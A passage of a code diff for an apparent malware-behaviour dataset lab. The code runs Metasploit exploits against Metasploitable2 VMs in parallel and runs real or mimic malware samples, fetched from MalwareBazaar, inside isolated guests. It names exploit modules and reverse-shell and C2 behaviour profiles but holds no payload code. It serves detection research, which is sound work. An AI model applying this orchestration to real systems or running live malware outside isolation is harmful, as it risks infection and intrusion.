            f.write("\n")
        os.replace(tmp, path)

-    def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
+    def emit_event(self, event: str, **extra) -> None:
+        """Append a row to events.jsonl. Public so external drivers
+        (e.g. the MSF exploit driver) can stamp their own events with
+        the same monotonic clock the orchestrator is using."""
+        t_mono_ns = (
+            time.monotonic_ns() - self._t_mono_origin_ns
+            if self._t_mono_origin_ns
+            else 0
+        )
        row = {
            "t_mono_ns": t_mono_ns,
            "t_wall_ns": time.time_ns(),
--- a/orchestrator/fleet.py
+++ b/orchestrator/fleet.py
@ -0,0 +1,467 @@
+"""Fleet runner — concurrent VM episodes with resource awareness.
+
+The lab host detects its own capacity, picks how many VMs to run in
+parallel without driving the box into swap or starving the host
+itself, and runs that many episodes simultaneously. Each slot gets a
+distinct ``Sample`` from the manifest (deterministically chosen by
+host_id + slot index), so every concurrent VM produces novel,
+labelable data.
+
+Capacity heuristic — defaults documented inline so they're auditable:
+
+  cores_total      = os.cpu_count()
+  cores_reserved   = max(1, cores_total // 8)        # host + collectors
+  ram_per_vm_mib   = 320                             # Alpine fits in 256
+                                                     # but leave 64 for
+                                                     # overhead (qemu+ovmf)
+  ram_headroom_mib = max(1024, ram_total // 8)       # never starve host
+  max_by_cores     = cores_total - cores_reserved
+  max_by_ram       = (ram_available - ram_headroom) // ram_per_vm
+  max_by_load      = if (load_1m / cores) > 0.75: tighter cap
+
+The smallest of these wins. The reasoning string is logged + saved
+into each episode's meta.json under ``fleet`` so post-hoc analysis
+can correlate "this episode was run when 6 VMs were concurrent" with
+its observed envelope.
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import shutil
+import signal
+import subprocess
+import threading
+import time
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from dataclasses import dataclass, field
+from pathlib import Path
+
+from exploits.modules import (
+    ModuleConfig, load_module_configs, module_target_port, select_module,
+)
+from samples.manifest import Sample, SampleManifest
+
+
+log = logging.getLogger("cis490.fleet")
+
+
+def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
+    """True when msfrpcd is listening — gate for the Tier-3 default.
+    A Tier-2 fallback runs when msfrpcd isn't there (still useful
+    data, just labeled with no-exploit so the trainer can filter)."""
+    import socket as _sk
+    try:
+        with _sk.create_connection((host, port), timeout=0.3):
+            return True
+    except OSError:
+        return False
+
+
+@dataclass(frozen=True)
+class FleetCapacity:
+    cores_total: int
+    cores_reserved: int
+    ram_total_mib: int
+    ram_available_mib: int
+    ram_per_vm_mib: int
+    ram_headroom_mib: int
+    load_1m: float
+    max_by_cores: int
+    max_by_ram: int
+    max_by_load: int
+    max_concurrent: int
+    rationale: str
+
+    def to_dict(self) -> dict:
+        return {
+            "cores_total": self.cores_total,
+            "cores_reserved": self.cores_reserved,
+            "ram_total_mib": self.ram_total_mib,
+            "ram_available_mib": self.ram_available_mib,
+            "ram_per_vm_mib": self.ram_per_vm_mib,
+            "ram_headroom_mib": self.ram_headroom_mib,
+            "load_1m": self.load_1m,
+            "max_by_cores": self.max_by_cores,
+            "max_by_ram": self.max_by_ram,
+            "max_by_load": self.max_by_load,
+            "max_concurrent": self.max_concurrent,
+            "rationale": self.rationale,
+        }
+
+
+@dataclass
+class FleetConfig:
+    host_id: str
+    repo_root: Path
+    data_root: Path
+    manifest: SampleManifest
+    # Module catalog for Tier-3 dispatch. Required for fleet-driven
+    # exploit-fire variety; empty catalog forces Tier-2 fallback.
+    modules: dict[str, ModuleConfig] = field(default_factory=dict)
+    # VM resource shape — must match what the launcher requests.
+    ram_per_vm_mib: int = 320
+    # Cap concurrency below the calculated max (e.g. for a smoke test).
+    max_concurrent_override: int | None = None
+    # Skip episodes whose sample requires a real binary that's not present.
+    require_real_samples: bool = False
+    # Force Tier-2 even when msfrpcd is up; used by tests + dev runs
+    # that want a no-exploit baseline.
+    force_tier2: bool = False
+    # msfrpcd connectivity (read by tier-3 driver via env).
+    msfrpcd_host: str = "127.0.0.1"
+    msfrpcd_port: int = 55553
+
+
+def _read_meminfo() -> dict[str, int]:
+    out: dict[str, int] = {}
+    try:
+        with open("/proc/meminfo") as f:
+            for line in f:
+                k, _, rest = line.partition(":")
+                v = rest.strip()
+                if v.endswith(" kB"):
+                    try:
+                        out[k] = int(v[:-3]) * 1024
+                    except ValueError:
+                        pass
+    except OSError:
+        pass
+    return out
+
+
+def _read_loadavg() -> float:
+    try:
+        with open("/proc/loadavg") as f:
+            return float(f.read().split()[0])
+    except (OSError, ValueError, IndexError):
+        return 0.0
+
+
+def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
+    cores_total = os.cpu_count() or 1
+    # Reserve at least 1 core, more if the host has many.
+    cores_reserved = max(1, cores_total // 8)
+
+    mem = _read_meminfo()
+    ram_total_b = mem.get("MemTotal", 0)
+    ram_avail_b = mem.get("MemAvailable", ram_total_b)
+    ram_total_mib = ram_total_b // (1024 * 1024)
+    ram_available_mib = ram_avail_b // (1024 * 1024)
+    # Never starve the host of more than ~7/8 of its memory.
+    ram_headroom_mib = max(1024, ram_total_mib // 8)
+
+    load_1m = _read_loadavg()
+
+    max_by_cores = max(0, cores_total - cores_reserved)
+    if ram_per_vm_mib <= 0:
+        max_by_ram = max_by_cores
+    else:
+        max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
+
+    # Load-based cap: if the host is already busy, run fewer VMs.
+    if cores_total and load_1m / cores_total > 0.75:
+        # Halve, floor 1.
+        max_by_load = max(1, max_by_cores // 2)
+    else:
+        max_by_load = max_by_cores
+
+    candidates = [max_by_cores, max_by_ram, max_by_load]
+    max_concurrent = max(0, min(candidates))
+
+    binding = ["cores", "ram", "load"][candidates.index(max_concurrent)] \
+        if max_concurrent < max_by_cores else "cores"
+    rationale = (
+        f"cores_total={cores_total} reserved={cores_reserved} "
+        f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
+        f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
+        f"-> max_concurrent={max_concurrent} (binding={binding})"
+    )
+    log.info("capacity: %s", rationale)
+
+    return FleetCapacity(
+        cores_total=cores_total,
+        cores_reserved=cores_reserved,
+        ram_total_mib=ram_total_mib,
+        ram_available_mib=ram_available_mib,
+        ram_per_vm_mib=ram_per_vm_mib,
+        ram_headroom_mib=ram_headroom_mib,
+        load_1m=load_1m,
+        max_by_cores=max_by_cores,
+        max_by_ram=max_by_ram,
+        max_by_load=max_by_load,
+        max_concurrent=max_concurrent,
+        rationale=rationale,
+    )
+
+
+# ---------------------------------------------------------------------------
+# Per-slot episode execution
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class SlotResult:
+    slot: int
+    sample_name: str
+    sample_kind: str
+    episode_id: str | None
+    rc: int
+    duration_s: float
+    tier: str = "tier2"            # "tier3" when an exploit fired
+    module_name: str | None = None  # exploit module identifier (Tier 3 only)
+    error: str | None = None
+    extra: dict = field(default_factory=dict)
+
+
+def _run_slot(
+    cfg: FleetConfig,
+    slot: int,
+    sample: Sample,
+    episode_index: int,
+    capacity: FleetCapacity,
+) -> SlotResult:
+    """Run one episode in a dedicated slot.
+
+    Dispatch:
+      - Tier 3 (default when msfrpcd is listening AND a module catalog
+        is populated): real exploit fire via run_tier3_demo.py with a
+        deterministically-selected module + sample.
+      - Tier 2 (fallback): no exploit; the controller drives a labeled
+        workload directly via the serial console. Recorded in
+        SlotResult.tier so trainers can filter the no-exploit episodes.
+    """
+    # Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
+    # this, parallel slots rmtree each other's run dir mid-boot.
+    run_dir_base = "/tmp/cis490-vm-fleet"
+
+    # Decide tier.
+    bridge_iface = os.environ.get("BRIDGE") or None
+    # Filter the catalog to modules that can actually fire under the
+    # current launcher mode. Reverse / bind shells require the host-
+    # only bridge (no SLIRP+restrict=on guest egress), so skip those
+    # when BRIDGE isn't set; otherwise the exploit fires but the
+    # session never lands and the episode degenerates to a 30 s
+    # session_open_timeout.
+    if cfg.modules:
+        if bridge_iface:
+            usable_modules = dict(cfg.modules)
+        else:
+            usable_modules = {
+                k: v for k, v in cfg.modules.items() if not v.requires_bridge
+            }
+    else:
+        usable_modules = {}
+    tier3_ready = (
+        not cfg.force_tier2
+        and bool(usable_modules)
+        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
+    )
+
+    env = os.environ.copy()
+    env["SLOT"] = str(slot)
+    env["SAMPLE_NAME"] = sample.name
+    env["SAMPLE_PROFILE"] = sample.profile
+    env["SAMPLE_KIND"] = sample.kind
+    env["FLEET_HOST_ID"] = cfg.host_id
+    env["FLEET_EPISODE_INDEX"] = str(episode_index)
+    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)
+
+    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
+    py = str(venv_py) if venv_py.exists() else "python3"
+
+    log_dir = cfg.data_root / "fleet-logs"
+    log_dir.mkdir(parents=True, exist_ok=True)
+    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"
+
+    if tier3_ready:
+        module = select_module(
+            usable_modules,
+            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
+        )
+        target_port = module_target_port(module) or 21
+        # Per-slot runner dir for the target VM.
+        run_dir = f"{run_dir_base}-target-{slot}"
+        env["RUN_DIR"] = run_dir
+        # Each slot gets a unique host-side hostfwd port so concurrent
+        # targets don't collide on the loopback port.
+        env["PORT_BASE"] = str(target_port + slot * 1000)
+        if bridge_iface:
+            env["BRIDGE"] = bridge_iface
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--module", module.name,
+            "--sample", sample.name,
+            "--target-port", str(target_port + slot * 1000),
+        ]
+        tier = "tier3"
+        module_name: str | None = module.name
+    else:
+        run_dir = f"{run_dir_base}-{slot}"
+        env["RUN_DIR"] = run_dir
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--sample", sample.name,
+        ]
+        tier = "tier2"
+        module_name = None
+        if not cfg.force_tier2 and not cfg.modules:
+            log.warning("slot=%d falling back to Tier 2: empty module catalog", slot)
+        elif not cfg.force_tier2:
+            log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
+                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
+
+    log.info(
+        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
+        slot, episode_index, tier, sample.name, module_name, run_dir,
+    )
+
+    started = time.monotonic()
+    try:
+        with out_log.open("ab") as logf:
+            proc = subprocess.run(
+                cmd,
+                cwd=str(cfg.repo_root),
+                env=env,
+                stdout=logf,
+                stderr=subprocess.STDOUT,
+                check=False,
+            )
+        rc = proc.returncode
+        err = None
+    except (OSError, subprocess.SubprocessError) as e:
+        rc = -1
+        err = str(e)
+    duration = time.monotonic() - started
+
+    return SlotResult(
+        slot=slot,
+        sample_name=sample.name,
+        sample_kind=sample.kind,
+        episode_id=None,
+        rc=rc,
+        duration_s=duration,
+        tier=tier,
+        module_name=module_name,
+        error=err,
+    )
+
+
+# ---------------------------------------------------------------------------
+# FleetRunner
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class FleetRunResult:
+    capacity: FleetCapacity
+    slots: list[SlotResult]
+    total_duration_s: float
+
+
+class FleetRunner:
+    def __init__(self, cfg: FleetConfig) -> None:
+        self.cfg = cfg
+        self._stop = threading.Event()
+
+    def stop(self) -> None:
+        self._stop.set()
+
+    def run(
+        self,
+        *,
+        episodes: int = 1,
+        episode_index_base: int = 0,
+        capacity_override: FleetCapacity | None = None,
+    ) -> FleetRunResult:
+        capacity = capacity_override or detect_capacity(
+            ram_per_vm_mib=self.cfg.ram_per_vm_mib,
+        )
+        n_slots = capacity.max_concurrent
+        if self.cfg.max_concurrent_override is not None:
+            n_slots = min(n_slots, self.cfg.max_concurrent_override)
+        if n_slots <= 0:
+            log.warning(
+                "fleet capacity is zero (%s); cannot run", capacity.rationale,
+            )
+            return FleetRunResult(
+                capacity=capacity, slots=[], total_duration_s=0.0,
+            )
+
+        log.info(
+            "fleet host=%s slots=%d episodes=%d manifest_size=%d",
+            self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
+        )
+
+        all_results: list[SlotResult] = []
+        t_start = time.monotonic()
+        for ep in range(episodes):
+            if self._stop.is_set():
+                break
+            episode_index = episode_index_base + ep
+            slot_samples = [
+                self.cfg.manifest.select(
+                    host_id=self.cfg.host_id,
+                    slot=slot,
+                    episode_index=episode_index,
+                )
+                for slot in range(n_slots)
+            ]
+            if self.cfg.require_real_samples:
+                slot_samples = [s for s in slot_samples if s.kind == "real"]
+                if not slot_samples:
+                    log.warning("require_real_samples: no real samples in manifest; skipping wave")
+                    continue
+
+            log.info(
+                "wave %d/%d: %s",
+                ep + 1, episodes,
+                [(i, s.name, s.kind) for i, s in enumerate(slot_samples)],
+            )
+
+            with ThreadPoolExecutor(max_workers=n_slots) as pool:
+                futures = [
+                    pool.submit(
+                        _run_slot, self.cfg, slot, sample, episode_index, capacity,
+                    )
+                    for slot, sample in enumerate(slot_samples)
+                ]
+                for fut in as_completed(futures):
+                    res = fut.result()
+                    log.info(
+                        "slot %d sample=%s rc=%d duration=%.1fs",
+                        res.slot, res.sample_name, res.rc, res.duration_s,
+                    )
+                    all_results.append(res)
+
+        total = time.monotonic() - t_start
+        return FleetRunResult(
+            capacity=capacity,
+            slots=all_results,
+            total_duration_s=total,
+        )
+
+
+# ---------------------------------------------------------------------------
+# Friendly capacity report (used by tools/run_fleet.py --capacity)
+# ---------------------------------------------------------------------------
+
+
+def capacity_report() -> str:
+    c = detect_capacity()
+    return (
+        f"cores: {c.cores_total} (reserve {c.cores_reserved})\n"
+        f"ram:   {c.ram_total_mib} MiB total, {c.ram_available_mib} MiB available "
+        f"(headroom {c.ram_headroom_mib} MiB, per-vm {c.ram_per_vm_mib} MiB)\n"
+        f"load:  1m={c.load_1m:.2f}\n"
+        f"caps:  by_cores={c.max_by_cores}, by_ram={c.max_by_ram}, "
+        f"by_load={c.max_by_load}\n"
+        f"--> max_concurrent VMs: {c.max_concurrent}\n"
+    )
--- a/pyproject.toml
+++ b/pyproject.toml
@ -6,6 +6,7 @@ requires-python = ">=3.11"
 dependencies = [
    "starlette>=0.36",
    "uvicorn[standard]>=0.27",
+    "msgpack>=1.0",  # MSF RPC wire format for the Tier-3 exploit driver
 ]

 [dependency-groups]
--- a/receiver/app.py
+++ b/receiver/app.py
@ -2,6 +2,7 @@ from __future__ import annotations

 import logging
 import secrets
+import time
 from pathlib import Path
 from typing import Awaitable, Callable

@ -17,6 +18,7 @@ log = logging.getLogger("cis490.receiver")


 SUFFIX = ".tar.zst"
+SCHEMA_VERSION = 1


 def _bearer_check(request: Request, expected: str | None) -> Response | None:
@ -40,6 +42,23 @@ def make_app(
    async def health(request: Request) -> JSONResponse:
        return JSONResponse({"status": "ok"})

+    async def ping(request: Request) -> JSONResponse:
+        """Smoke-test endpoint. Verifies that the auth layer and the
+        WG/Caddy/receiver pipe are alive end-to-end without persisting
+        anything — index.jsonl is untouched. Used by ``cis490-shipper
+        --ping`` during initial bring-up of a new lab host."""
+        guard = _bearer_check(request, bearer_token)
+        if guard is not None:
+            return guard
+        return JSONResponse(
+            {
+                "ok": True,
+                "host_id": request.headers.get("x-lab-host"),
+                "t_wall_ns": time.time_ns(),
+                "schema_version": SCHEMA_VERSION,
+            }
+        )
+
    async def put_episode(request: Request) -> JSONResponse:
        guard = _bearer_check(request, bearer_token)
        if guard is not None:
@ -124,6 +143,7 @@ def make_app(

    routes = [
        Route("/v1/health", health, methods=["GET"]),
+        Route("/v1/ping", ping, methods=["POST"]),
        Route(
            "/v1/episodes/{host_id}/{filename}",
            put_episode,
--- a/samples/README.md
+++ b/samples/README.md
@ -1,33 +1,107 @@
 # samples/

-**Sample binaries are NEVER committed to this repo.** This directory holds:
+Catalog of malware (or behaviour-matched mimics) the fleet draws from.
+**Sample binaries are NEVER committed to this repo.**

- `manifest.yaml` — sha256-pinned list of samples to fetch, with metadata
-  (source, category, expected behavior, target CVE).
- `fetch.py` — script that pulls samples from configured sources
-  (MalwareBazaar, theZoo, vx-underground), verifies sha256, and stores them
-  under `samples/store/` (gitignored).
- Per-sample notes in markdown describing observed behavior in our lab.
+## What's here

-`samples/store/` lives only on the lab host. It is gitignored *and* should
-sit on a disk that is not auto-mounted on developer workstations.
-
-## Manifest entry shape (placeholder)
-
-```yaml
-samples:
-  - name: linux.miner.xmrig.elf
-    sha256: "..."                # pinned
-    source: MalwareBazaar
-    category: miner
-    target_cve: null              # cryptominers are usually post-exploit payloads
-    behavior: "high CPU, periodic stratum protocol traffic"
-    pairs_with_exploit: exploit/multi/samba/usermap_script
 ```
+manifest.toml      schema-checked catalog (loaded by samples/manifest.py)
+manifest.py        loader + per-(host_id, slot, ep) deterministic selection
+store/             SHA-256-pinned binary content (gitignored — never commit)
+.bazaar.token      MalwareBazaar API key (mode 0600, gitignored)
+```
+
+## Manifest schema
+
+Each entry in `manifest.toml`:
+
+```toml
+[[sample]]
+name        = "xmrig-cryptominer"   # unique within manifest, DNS-safe
+family      = "XMRig"               # canonical family label for ML
+category    = "cryptominer"         # one of: cryptominer, botnet, ransomware,
+                                    # banking-trojan, fileless, rat, worm,
+                                    # loader, wiper, other
+profile     = "cpu-saturate"        # behaviour profile from
+                                    # exploits/workloads.py — gates the
+                                    # in-session shell workload when no
+                                    # real binary is staged
+description = "..."
+
+# Optional — present iff this is a real binary the fetcher should pull:
+sha256 = "abc123..."
+source = "MalwareBazaar"
+url    = "https://bazaar.abuse.ch/sample/abc123/"
+```
+
+The loader rejects unknown categories and duplicate names. See
+`tests/test_fleet.py` for the property tests covering selection
+distribution + catalog walkability.
+
+## "real" vs "mimic"
+
+`Sample.kind` is **`"real"`** when `sha256` is set, otherwise **`"mimic"`**.
+
+- **Mimic** — the orchestrator runs the matching profile-shaped shell
+  command (cpu-saturate / scan-and-dial / io-walk / bursty-c2 /
+  low-and-slow / shell-resident) inside the guest. No real binary
+  needed; useful right now for testing the dataset pipeline and as
+  the realistic-but-safe envelope class the trainer expects.
+- **Real** — the orchestrator's Tier-3+ driver chunked-uploads
+  `samples/store/<sha256>` into the shell session, sha256-verifies on
+  the guest side, and execs it. Hash mismatch fail-stops the run; a
+  tampered binary is never executed.
+
+`meta.sample.kind` lands in every episode's `meta.json`, so trainers
+can stratify on it (the realistic-model path consumes only
+`kind == "real"` episodes by default).
+
+## Fetching a real binary
+
+```sh
+# 1. Register a (free) account at https://bazaar.abuse.ch and get the API key.
+echo "<your-key>" > samples/.bazaar.token
+chmod 0600 samples/.bazaar.token
+
+# 2. Add an entry with sha256+source+url to manifest.toml.
+
+# 3. Pull the binary into samples/store/<sha256>:
+uv run python tools/fetch_sample.py <sha256>
+```
+
+Idempotent — re-running checks the staged copy's sha256 and skips the
+download if it already matches.
+
+## Per-(host, slot, episode) selection
+
+`manifest.py::SampleManifest.select(host_id, slot, episode_index)`
+hashes those three into a uniform integer and indexes the catalog.
+Two lab hosts on the same slot pick *different* samples (collision
+rate ~1/N). A single host walks the whole catalog within ~`len(manifest)`
+episodes. No coordinator.

 ## Safety rules

- Only download to the lab host, never to a developer workstation.
- Verify sha256 immediately, before any other read.
- Keep the directory on a path that is *not* on the WG overlay.
- Re-verify sha256 before each detonation; refuse to run on mismatch.
+- **Only download to a lab host, never to a developer workstation.**
+  `samples/store/` lives only there, gitignored, on a disk that is
+  not auto-mounted elsewhere.
+- The lab host's `br-malware` bridge is host-only by design (no NAT,
+  no route). Real malware running in the guest cannot call out unless
+  the operator explicitly opens egress, which we don't.
+- Snapshot/revert (see `EpisodeConfig.revert_at_*` + `qmp.savevm`/
+  `loadvm`) means every fresh episode starts from a known-good
+  baseline regardless of what the previous one did to the guest.
+- The fetcher verifies sha256 on download; the driver verifies again
+  in-guest before exec. Both layers must match the manifest.
+
+## Adding a sample
+
+1. Pick a `family` + `category` from the closed enum above.
+2. Pick a `profile` from `exploits/workloads.all_profiles()`. If the
+   sample's behaviour doesn't match any of the six existing shapes,
+   add a new factory to `exploits/workloads.py` *first*, with tests.
+3. (Real-only) Compute `sha256`, fetch via `tools/fetch_sample.py`,
+   verify the staged file's hash matches.
+4. Append the entry to `manifest.toml`.
+5. Run the test suite — the manifest loader's invariants catch typos.
--- a/samples/init.py
+++ b/samples/init.py
--- a/samples/manifest.py
+++ b/samples/manifest.py
@ -0,0 +1,113 @@
+"""Sample manifest loader + per-(host, slot) deterministic selection.
+
+The manifest at ``samples/manifest.toml`` defines the catalog of
+samples (real or mimic) the fleet draws from. Selection is
+**deterministic** given ``(host_id, slot, episode_index)`` so two lab
+hosts on the same fleet pick *different* samples for the same slot
+index, and the same host repeats only after exhausting the catalog.
+
+This gives us "all hosts on the network generating novel data" without
+needing a coordinator: every host's `host_id` seeds its own
+sample-rotation order, and the orderings spread across the catalog.
+"""
+
+from __future__ import annotations
+
+import hashlib
+import tomllib
+from dataclasses import dataclass, field
+from pathlib import Path
+
+
+_VALID_CATEGORIES = {
+    "cryptominer", "botnet", "ransomware", "banking-trojan",
+    "fileless", "rat", "worm", "loader", "wiper", "other",
+}
+
+
+@dataclass(frozen=True)
+class Sample:
+    name: str
+    family: str
+    category: str
+    profile: str
+    description: str = ""
+    source: str | None = None
+    sha256: str | None = None
+    url: str | None = None
+
+    @property
+    def kind(self) -> str:
+        """``"real"`` if a sha256-pinned binary is expected, else ``"mimic"``.
+        Trainers filter on this so the realistic-model pipeline only
+        consumes real-malware episodes."""
+        return "real" if self.sha256 else "mimic"
+
+    def binary_path(self, store_root: Path) -> Path | None:
+        """Resolved path of the staged binary, or None if this sample
+        has no sha256 (mimic) or the binary hasn't been fetched yet."""
+        if not self.sha256:
+            return None
+        p = Path(store_root) / self.sha256
+        return p if p.exists() else None
+
+
+@dataclass(frozen=True)
+class SampleManifest:
+    samples: list[Sample] = field(default_factory=list)
+
+    def __len__(self) -> int:
+        return len(self.samples)
+
+    def select(self, *, host_id: str, slot: int, episode_index: int = 0) -> Sample:
+        """Deterministic selection. The host_id mixes into the seed so
+        different hosts visit the catalog in different orders; slot +
+        episode_index tick within a host. Same inputs always give the
+        same sample — replay-friendly for debugging."""
+        if not self.samples:
+            raise ValueError("manifest is empty")
+        # SHA-256 of the seed gives a uniformly distributed integer.
+        seed = f"{host_id}|{slot}|{episode_index}".encode()
+        h = hashlib.sha256(seed).digest()
+        idx = int.from_bytes(h[:8], "big") % len(self.samples)
+        return self.samples[idx]
+
+    @classmethod
+    def load(cls, path: str | Path) -> "SampleManifest":
+        with open(path, "rb") as f:
+            data = tomllib.load(f)
+        raw = data.get("sample") or []
+        if not isinstance(raw, list):
+            raise ValueError(f"{path}: 'sample' must be an array of tables")
+
+        samples: list[Sample] = []
+        for i, entry in enumerate(raw):
+            if not isinstance(entry, dict):
+                raise ValueError(f"{path}: sample[{i}] is not a table")
+            for key in ("name", "family", "category", "profile"):
+                if not isinstance(entry.get(key), str) or not entry[key]:
+                    raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
+            if entry["category"] not in _VALID_CATEGORIES:
+                raise ValueError(
+                    f"{path}: sample[{i}] category {entry['category']!r} "
+                    f"not in {sorted(_VALID_CATEGORIES)}"
+                )
+            samples.append(Sample(
+                name=entry["name"],
+                family=entry["family"],
+                category=entry["category"],
+                profile=entry["profile"],
+                description=entry.get("description", ""),
+                source=entry.get("source"),
+                sha256=entry.get("sha256"),
+                url=entry.get("url"),
+            ))
+
+        # Reject duplicate names — trainers join on this.
+        seen: set[str] = set()
+        for s in samples:
+            if s.name in seen:
+                raise ValueError(f"{path}: duplicate sample name {s.name!r}")
+            seen.add(s.name)
+
+        return cls(samples=samples)
--- a/samples/manifest.toml
+++ b/samples/manifest.toml
@ -0,0 +1,61 @@
+# Sample manifest — what each fleet slot picks from.
+#
+# Each entry has three things:
+#   - identity (name, family, category) for labeling
+#   - acquisition (source, sha256, url) for reproducibility
+#   - behaviour (profile) so the synthetic load mimic can run a
+#     reasonable proxy until the real sample lands at vm/images/
+#
+# When the real malware binary is present at samples/store/<sha256>,
+# the orchestrator runs THAT inside the guest. When it's absent, the
+# orchestrator falls back to running tools/load_mimic.py with the
+# matching profile so the fleet still produces *labeled, varied* data
+# while we collect the real samples. Either way, meta.json records
+# which path the episode took, so trainers can filter on
+# meta.sample.kind ∈ {real, mimic}.
+
+[[sample]]
+name = "xmrig-cryptominer"
+family = "XMRig"
+category = "cryptominer"
+profile = "cpu-saturate"
+# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
+# source = "MalwareBazaar"
+# sha256 = "TBD"
+# url    = "https://bazaar.abuse.ch/sample/TBD/"
+description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
+
+[[sample]]
+name = "mirai-class-bot"
+family = "Mirai"
+category = "botnet"
+profile = "scan-and-dial"
+description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
+
+[[sample]]
+name = "ransomware-mimic"
+family = "Cryptolocker-class"
+category = "ransomware"
+profile = "io-walk"
+description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
+
+[[sample]]
+name = "dridex-class-trojan"
+family = "Dridex"
+category = "banking-trojan"
+profile = "bursty-c2"
+description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
+
+[[sample]]
+name = "kovter-class-stealth"
+family = "Kovter"
+category = "fileless"
+profile = "low-and-slow"
+description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
+
+[[sample]]
+name = "reverse-shell-resident"
+family = "Reverse-Shell"
+category = "rat"
+profile = "shell-resident"
+description = "Single TCP socket pinned to an attacker IP, occasional command bursts."
--- a/scripts/fetch-alpine-baseline.sh
+++ b/scripts/fetch-alpine-baseline.sh
@ -0,0 +1,62 @@
+#!/usr/bin/env bash
+# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
+# baseline guest. Convert to qcow2 if necessary; verify sha512 against
+# the value pinned in docs/sources.md.
+#
+# Usage:
+#   scripts/fetch-alpine-baseline.sh <out_path>
+#
+# Examples:
+#   scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
+#   sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
+#
+# Idempotent — re-runs check the destination and short-circuit if the
+# checksum already matches.
+
+set -euo pipefail
+
+OUT="${1:-}"
+if [[ -z "$OUT" ]]; then
+    echo "usage: $0 <out_path>" >&2
+    exit 2
+fi
+
+URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
+SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
+
+log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
+
+if [[ -f "$OUT" ]]; then
+    actual="$(sha512sum "$OUT" | awk '{print $1}')"
+    if [[ "$actual" == "$SHA512" ]]; then
+        log "$OUT already present and verified"
+        exit 0
+    fi
+    log "$OUT exists but checksum differs — refetching"
+    rm -f "$OUT"
+fi
+
+mkdir -p "$(dirname "$OUT")"
+TMP="$OUT.partial"
+trap 'rm -f "$TMP"' EXIT
+
+log "downloading $URL"
+if command -v curl >/dev/null; then
+    curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
+elif command -v wget >/dev/null; then
+    wget -O "$TMP" "$URL"
+else
+    log "neither curl nor wget on PATH"
+    exit 1
+fi
+
+log "verifying sha512"
+actual="$(sha512sum "$TMP" | awk '{print $1}')"
+if [[ "$actual" != "$SHA512" ]]; then
+    log "sha512 mismatch: expected $SHA512, got $actual"
+    exit 1
+fi
+
+mv "$TMP" "$OUT"
+trap - EXIT
+log "wrote $OUT ($(stat -c%s "$OUT") bytes)"
--- a/scripts/fetch-metasploitable2.sh
+++ b/scripts/fetch-metasploitable2.sh
@ -0,0 +1,69 @@
+#!/usr/bin/env bash
+# Fetch + sha256-verify the Metasploitable2 disk image.
+#
+# Rapid7's official download is gated behind a registration form, so
+# we accept the URL + sha256 from env vars (with sane defaults pointing
+# at a public mirror). The user installs this once per lab host.
+#
+# Inputs (env):
+#   IMAGE_URL  — direct download URL for the metasploitable2 archive
+#   IMAGE_SHA256 — expected sha256 of the archive
+#   OUT_DIR    — where to drop the qcow2 (default vm/images/)
+#
+# Outputs:
+#   $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
+#                                    if needed.
+#
+# We do NOT bake an image url+hash into the repo because the canonical
+# distribution is a registration-walled zip on Rapid7. Operators must
+# supply both; the rest is mechanical.
+
+set -euo pipefail
+
+IMAGE_URL="${IMAGE_URL:-}"
+IMAGE_SHA256="${IMAGE_SHA256:-}"
+OUT_DIR="${OUT_DIR:-$(cd "$(dirname "$0")/../vm/images" 2>/dev/null && pwd)}"
+WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
+
+log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
+die() { log "FATAL: $*"; exit 1; }
+
+[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
+[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
+
+mkdir -p "$OUT_DIR" "$WORK_DIR"
+
+ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
+log "downloading $IMAGE_URL → $ARCHIVE"
+if [[ -f "$ARCHIVE" ]]; then
+    log "archive already present; skipping download"
